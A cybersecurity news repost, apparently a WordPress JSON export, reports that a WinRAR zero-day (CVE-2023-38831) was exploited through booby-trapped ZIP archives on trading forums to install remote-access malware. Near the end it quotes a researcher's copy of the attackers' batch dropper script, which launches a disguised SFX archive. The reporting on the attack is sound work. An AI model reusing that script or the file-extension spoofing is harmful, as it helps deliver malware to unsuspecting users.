{"id":53369,"date":"2023-08-24T13:58:59","date_gmt":"2023-08-24T13:58:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/34941\/WinRAR-0-Day-That-Uses-Poisoned-JPG-And-TXT-Files-Under-Exploit-Since-April.html"},"modified":"2023-08-24T13:58:59","modified_gmt":"2023-08-24T13:58:59","slug":"winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/","title":{"rendered":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/exploit-800x534.jpg\" alt=\"Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word &quot;exploit&quot;\"><figcaption class=\"caption\">\n<div class=\"caption-credit\">Getty Images<\/div>\n<\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/security\/2023\/08\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">76<\/span> <span class=\"visually-hidden\"> with <\/span> <\/a> <\/aside>\n<p> <!-- cache hit 205:single\/related:6b4a3f8c27670783698bd4c5e1ed2130 --><!-- empty --><\/p>\n<p>A newly discovered zero-day in the widely used WinRAR file-compression program has been exploited for four months by unknown attackers who are using it to install malware when targets open booby-trapped JPGs and other innocuous inside file archives.<\/p>\n<p>The vulnerability, residing in the way WinRAR processes the ZIP file format, has been under active exploit since April in securities trading forums, researchers from security firm Group IB <a href=\"https:\/\/www.group-ib.com\/blog\/cve-2023-38831-winrar-zero-day\/\">reported Wednesday<\/a>. The attackers have been using the vulnerability to remotely execute code that installs malware from families, including DarkMe, GuLoader, and Remcos RAT.<\/p>\n<p>From there, the criminals withdraw money from broker accounts. The total amount of financial losses and total number of victims infected is unknown, although Group-IB said it has tracked at least 130 individuals known to have been compromised. WinRAR developers fixed the vulnerability, tracked as CVE-2023-38831, earlier this month.<\/p>\n<h2>Weaponizing ZIP archives<\/h2>\n<p>\u201cBy exploiting a vulnerability within this program, threat actors were able to craft ZIP archives that serve as carriers for various malware families,\u201d Group-IB Malware Analyst \u200b\u200bAndrey Polovinkin wrote. \u201cWeaponized ZIP archives were distributed on trading forums. Once extracted and executed, the malware allows threat actors to withdraw money from broker accounts. This vulnerability has been exploited since April 2023.\u201d<\/p>\n<p>While Group-IB hasn\u2019t detected the vulnerability being exploited in other settings or installing other malware families, it wouldn\u2019t be surprising if that\u2019s the case. In 2019, a similar WinRAR vulnerability tracked as CVE-2018-20250 <a href=\"https:\/\/arstechnica.com\/information-technology\/2019\/03\/nasty-winrar-bug-is-being-actively-exploited-to-install-hard-to-detect-malware\/\">came under active attack<\/a> within weeks of <a href=\"https:\/\/arstechnica.com\/information-technology\/2019\/02\/nasty-code-execution-bug-in-winrar-threatened-millions-of-users-for-14-years\/\">becoming public<\/a>. It was used in no fewer than <a href=\"https:\/\/arstechnica.com\/information-technology\/2019\/03\/a-rogues-gallery-of-bad-actors-are-exploiting-that-critical-winrar-flaw\/\">five separate campaigns<\/a> by separate threat actors.<\/p>\n<p>WinRAR has more than 500 million users who rely on the program to compress large files to make them more manageable and quicker to upload and download. It\u2019s not uncommon for people to immediately decompress the resulting ZIP files without inspecting them first. Even when people attempt to examine them for malice, antivirus software often has trouble peering into the compressed data to identify malicious code.<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p>The malicious ZIP archives Group-IB found were posted on public forums used by traders to swap information and discuss topics related to cryptocurrencies and other securities. In most cases, the malicious ZIPs were attached to forum posts. In other cases, they were distributed on the file storage site catbox[.]moe. Group-IB identified eight popular trading forums used to spread the files.<\/p>\n<p>In one case, administrators of one of the abused forums warned users after discovering harmful files were distributed on the platform.<\/p>\n<p>\u201cDespite this warning, further posts were made and more users were affected,\u201d Polovinkin wrote. \u201cOur researchers also saw evidence that the threat actors were able to unblock accounts that were disabled by forum administrators to continue spreading malicious files, whether by posting in threads or sending private messages.&#8221; The images below show some of the postings used to entice people into downloading them and a warning issued by an admin of one of the abused forums.<\/p>\n<div class=\"gallery shortcode-gallery gallery-wide\">\n<ul>\n<li data-thumb=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/1-9-150x150.webp\" data-src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/1-9.webp\" data-responsive=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/1-9.webp 1080, https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/1-9.webp 2560\" data-sub-html=\"#caption-1962629\">\n<figure><figcaption id=\"caption-1962629\"> <span class=\"icon caption-arrow icon-drop-indicator\"><\/span> <\/p>\n<div class=\"caption\"> A post made by the threat actor. <\/div>\n<\/figcaption><\/figure>\n<\/li>\n<li data-thumb=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/3-9-150x150.webp\" data-src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/3-9.webp\" data-responsive=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/3-9.webp 1080, https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/3-9.webp 2560\" data-sub-html=\"#caption-1962631\">\n<figure><figcaption id=\"caption-1962631\"> <span class=\"icon caption-arrow icon-drop-indicator\"><\/span> <\/p>\n<div class=\"caption\"> Another example. <\/div>\n<\/figcaption><\/figure>\n<\/li>\n<li data-thumb=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/4-8-150x150.webp\" data-src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/4-8.webp\" data-responsive=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/4-8.webp 1080, https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/4-8.webp 2560\" data-sub-html=\"#caption-1962632\">\n<figure><figcaption id=\"caption-1962632\"> <span class=\"icon caption-arrow icon-drop-indicator\"><\/span> <\/figcaption><\/figure>\n<\/li>\n<li data-thumb=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/5-7-150x150.webp\" data-src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/5-7.webp\" data-responsive=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/5-7.webp 1080, https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/5-7.webp 2560\" data-sub-html=\"#caption-1962633\">\n<figure><figcaption id=\"caption-1962633\"> <span class=\"icon caption-arrow icon-drop-indicator\"><\/span> <\/figcaption><\/figure>\n<\/li>\n<li data-thumb=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/6-7-150x150.webp\" data-src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/6-7.webp\" data-responsive=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/6-7.webp 1080, https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/6-7.webp 2560\" data-sub-html=\"#caption-1962634\">\n<figure><figcaption id=\"caption-1962634\"> <span class=\"icon caption-arrow icon-drop-indicator\"><\/span> <\/p>\n<div class=\"caption\"> Admin warning of the malicious ZIP file. <\/div>\n<\/figcaption><\/figure>\n<\/li>\n<\/ul><\/div>\n<p>One forum participant reported that the attackers gained unauthorized access to a broker account. An attempted withdrawal of funds failed for reasons that aren\u2019t entirely clear.<\/p>\n<figure class=\"image shortcode-img center full\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/8-5.webp\" width=\"646\" height=\"448\"><\/figure>\n<h2>Intricate infection chain<\/h2>\n<p>The attackers\u2019 exploit launched an intricate infection chain illustrated below:<\/p>\n<figure class=\"image shortcode-img full full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/9-4.webp\" width=\"1600\" height=\"1329\"><\/figure>\n<p>Polovinkin wrote:<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<blockquote>\n<p>The cybercriminals are exploiting a vulnerability that allows them to spoof file extensions, which means that they are able to hide the launch of malicious code within an archive masquerading as a \u2018.jpg\u2019, \u2018.txt\u2019, or any other file format. They create a ZIP archive containing both malicious and non-malicious files. When the victim opens a specially crafted archive, the victim will usually see an image file and a folder with the same name as the image file.<\/p>\n<figure class=\"image shortcode-img full full-width\"><img loading=\"lazy\" decoding=\"async\" alt=\"Screenshot showing archive contents, including a .jpg file.\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/11-5.webp\" width=\"950\" height=\"188\"><figcaption class=\"caption\">\n<div class=\"caption-text\">Screenshot showing archive contents, including a .jpg file.<\/div>\n<\/figcaption><\/figure>\n<p>If the victim clicks on the decoy file, which can masquerade as an image, a script is executed that launches the next stage of the attack. This process is illustrated in Figure 10 (below).<\/p>\n<figure class=\"image shortcode-img full full-width\"><img loading=\"lazy\" decoding=\"async\" alt=\"Figure 10\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/08\/10-3.webp\" width=\"2016\" height=\"638\"><figcaption class=\"caption\"><\/figcaption><\/figure>\n<p>During our investigation, we noticed that the ZIP archive has a modified file structure. There are two files in the archive: a picture and a script. Instead of the image opening, the script is launched. The script\u2019s main purpose is to initiate the next stage of the attack. This is done by running a minimized window of itself. It then searches for two specific files, namely \u201cScreenshot_05-04-2023.jpg\u201d and \u201cImages.ico.\u201d The JPG file is an image that the victim opened initially. \u201cImages.ico\u201d is an SFX CAB archive designed to extract and launch new files. Below is an example of the script:<\/p>\n<p><code>@echo off<br \/>if not DEFINED IS_MINIMIZED<br \/>set IS_MINIMIZED=1 &amp;&amp; start \"\" \/min \"%~dpnx0\" %* &amp;&amp; exit<br \/>cd %TEMP%<br \/>for \/F \"delims=\" %%K in ('dir \/b \/s \"Screenshot_05-04-2023.jpg\"') do<br \/>for \/F \"delims=\" %%G in ('dir \/b \/s \"Images.ico\"') do<br \/>WMIC process call create \"%%~G\" &amp;&amp; \"%%~K\" &amp;&amp; cd %CD% &amp;&amp; exit<br \/>exit<\/code><\/p>\n<\/blockquote>\n<p>Now that the vulnerability has become widely known, it will likely become widely exploited. Anyone using WinRAR should update to <a href=\"https:\/\/www.rarlab.com\/\">version 6.23<\/a> before using the program again.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/34941\/WinRAR-0-Day-That-Uses-Poisoned-JPG-And-TXT-Files-Under-Exploit-Since-April.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":53370,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[9085],"class_list":["post-53369","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineflawzero-day"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-24T13:58:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/exploit-800x534.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April\",\"datePublished\":\"2023-08-24T13:58:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/\"},\"wordCount\":816,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg\",\"keywords\":[\"headline,flaw,zero day\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/\",\"name\":\"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg\",\"datePublished\":\"2023-08-24T13:58:59+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg\",\"width\":800,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,flaw,zero day\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineflawzero-day\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/","og_locale":"en_US","og_type":"article","og_title":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-08-24T13:58:59+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/exploit-800x534.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April","datePublished":"2023-08-24T13:58:59+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/"},"wordCount":816,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/08\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg","keywords":["headline,flaw,zero day"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/","url":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/","name":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/08\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg","datePublished":"2023-08-24T13:58:59+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/08\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/08\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april.jpg","width":800,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/winrar-0-day-that-uses-poisoned-jpg-and-txt-files-under-exploit-since-april\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,flaw,zero day","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineflawzero-day\/"},{"@type":"ListItem","position":3,"name":"WinRAR 0-Day That Uses Poisoned JPG And TXT Files Under Exploit Since April"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 